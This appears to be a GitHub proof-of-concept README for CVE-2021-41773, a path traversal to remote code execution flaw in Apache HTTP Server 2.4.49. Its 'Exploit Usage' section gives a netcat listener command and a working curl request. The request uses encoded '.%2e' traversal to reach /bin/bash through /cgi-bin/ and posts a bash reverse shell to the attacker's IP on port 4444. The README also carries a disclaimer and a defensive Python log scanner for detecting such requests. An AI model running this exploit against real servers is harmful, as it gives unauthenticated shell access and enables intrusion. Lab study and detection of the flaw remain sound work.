# CVE-2021-41773 – Apache HTTP Server 2.4.49 Remote Code Execution
> ⚠️ **Disclaimer**
> This repository is intended **strictly for educational and research purposes only**.
> The information and code provided here can be used in **controlled environments**, such as private lab machines.
> **Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**
> The author is **not responsible** for any misuse or damages caused.
---
## 🔍 About the Vulnerability
**CVE-2021-41773** affects **Apache HTTP Server version 2.4.49**.
Due to improper input validation in path normalization, an attacker can exploit **path traversal** using encoded characters like `%2e` to access arbitrary files.
If **CGI is enabled**, this vulnerability can be escalated to **unauthenticated remote code execution (RCE)**.
- **Vulnerability Type:** Path Traversal to Remote Code Execution
- **Affected Version:** Apache 2.4.49
- **Authentication Required:** ❌ No
- **Severity:** Critical
- **CVSS Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
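
Detection-side view of the flaw described above, as an added example (not part of the original repository): a Python scanner for Apache access logs that flags request paths where `..` segments only appear after percent-decoding, and separates POSTs under `/cgi-bin/` from plain file reads. It also collapses nested encodings, which goes beyond the `%2e` case in the text; the log lines, function names and finding labels are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line and status as they appear in Apache common/combined log format.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so nested encodings collapse as well."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return a finding dict for encoded dot-dot traversal, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    raw = m["target"].split("?", 1)[0]
    decoded = fully_decode(raw)
    # Literal ".." is normalized by the server; only dots hidden by encoding count.
    hidden = decoded.split("/").count("..") - raw.split("/").count("..")
    if hidden <= 0:
        return None
    cgi_post = raw.lower().startswith("/cgi-bin/") and m["method"] == "POST"
    return {
        "kind": "cgi-exec-attempt" if cgi_post else "file-read-attempt",
        "resolved": posixpath.normpath(decoded),  # where the path lands after decoding
        "status": int(m["status"]),  # a 2xx here deserves immediate triage
    }

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [06/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 45',
    '192.0.2.10 - - [06/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/tmp/example.txt HTTP/1.1" 200 64',
    '192.0.2.10 - - [06/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1" 200 12',
    '192.0.2.10 - - [06/Oct/2021:10:00:04 +0000] "GET /docs/../index.html HTTP/1.1" 200 45',
]

def scan(lines):
    """Return (line index, finding) pairs for every flagged line."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE):
        print(idx, finding)
```
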
---
## 🧾 References
- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)
- [Exploit-DB – 50383](https://www.exploit-db.com/exploits/50383)
- [GitHub PoC](https://github.com/battleoverflow/apache-traversal)
- [NVD CVE Report](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)
---
## 🛠 Exploit Overview
A malicious `curl` request is crafted to exploit the path traversal flaw. When CGI is enabled, attackers can reach `/bin/bash` and run arbitrary shell commands.
In this example, a **reverse shell payload** is sent to gain shell access from the server.
---
## 💥 Demonstration
This exploit was tested in a **private lab environment**. Below are the steps and outcomes.
### 1. Detecting Apache Version
An Nmap scan identified the target running Apache/2.4.49.

---
### 2. Exploit Execution
A reverse shell payload was delivered using a crafted curl command.

---
### 3. Reverse Shell Received
A reverse shell was successfully obtained on the attacker's listener.

---
## 📂 Exploit Usage
**Step 1: Start Netcat Listener**
```bash
nc -nvlp 4444
```
**Step 2: Run Exploit**
```bash
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
```
### ✔️ Ensure:
- Apache version is 2.4.49
- CGI is enabled
- Port 4444 (or your chosen port) is open through the firewall
## 📖 Medium Blog
Check out the detailed walkthrough and theory on my Medium post:
👉 [Read the blog on Medium](https://medium.com/cyberquestor/️-cve-2021-41773-exploiting-apache-2-4-49-path-traversal-to-remote-code-execution-rce-2ab23c5837cd)
File snapshot
```
[4.0K] /data/pocs/4468d48464791ea8521e232fb178afed2b753507
├── [4.0K] img
│   ├── [180K] apache-version.png
│   ├── [222K] exploit-command.png
│   └── [ 56K] reverse-shell.png
└── [2.9K] README.md
1 directory, 4 files
```